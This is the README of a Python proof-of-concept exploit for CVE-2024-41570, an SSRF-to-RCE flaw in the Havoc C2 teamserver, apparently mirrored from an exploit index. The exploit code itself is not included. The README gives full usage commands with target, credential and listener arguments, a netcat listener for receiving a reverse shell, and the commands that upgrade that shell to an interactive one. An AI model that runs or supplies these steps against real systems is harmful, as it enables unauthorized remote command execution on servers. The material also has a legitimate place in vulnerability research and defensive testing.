## https://sploitus.com/exploit?id=8F3EF3F5-8D9C-511D-9A32-A07E8B9C1717
# CVE-2024-41570 | Havoc C2 SSRF with RCE | Automated Reverse Shell Exploit via WebSocket

This project provides a Python-based proof-of-concept (PoC) script to exploit a vulnerable WebSocket-based service. The script automates agent registration, WebSocket payload delivery, and remote command execution to establish a reverse shell.

## Features
- Registers an agent to the target service.
- Opens a WebSocket and sends handshake and authentication payloads.
- Executes commands remotely via a reverse shell.
- Provides a guided workflow with clear instructions.

## Prerequisites
- Python 3.x installed on your machine.
- Install required dependencies by running:
  ```bash
  pip install -r requirements.txt
  ```

## Installation
1. Clone this repository:
   ```bash
   git clone https://github.com/<your-repo-name>.git
   ```
2. Navigate to the project directory:
   ```bash
   cd CVE-2024-41570
   ```
3. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```

## Usage
Run the script with the required arguments:

```bash
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
```

### Arguments
- `-t`: Target URL of the WebSocket server.
- `-i`: IP address of the Havoc Team Server.
- `-p`: Port of the Havoc Team Server.
- `-U`: Username for WebSocket authentication.
- `-P`: Password for WebSocket authentication.
- `-l`: Listener IP for the reverse shell (your machine).
- `-L`: Listener port for the reverse shell (your machine).

### Example Command
```bash
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
```

### Steps to Execute
1. Ensure the target service is running and vulnerable.
2. Run the script with the required parameters.
3. In a separate terminal, start a listener:
   ```bash
   nc -lvnp <listener_port>
   ```
4. Upgrade shell:
   ```bash
   python -c 'import pty; pty.spawn("/bin/bash")'
   export TERM=xterm-256color
   stty rows 67 columns 318
   ```

## Dependencies
The script requires the following Python libraries:
- `requests`
- `pycryptodome`

Install them using the command:
```bash
pip install -r requirements.txt
```

## Security Notice
This script is intended for educational purposes only. Ensure you have explicit authorization to test the target system. Misuse of this script may violate laws and ethical guidelines.

## References
Inspired by [Default Havoc PoC](https://github.com/chebuya/Havoc-C2-SSRF-poc).

## Contributing
Contributions are welcome! Feel free to fork the repository and submit a pull request.

## License
This project is licensed under the MIT License. See the LICENSE file for details.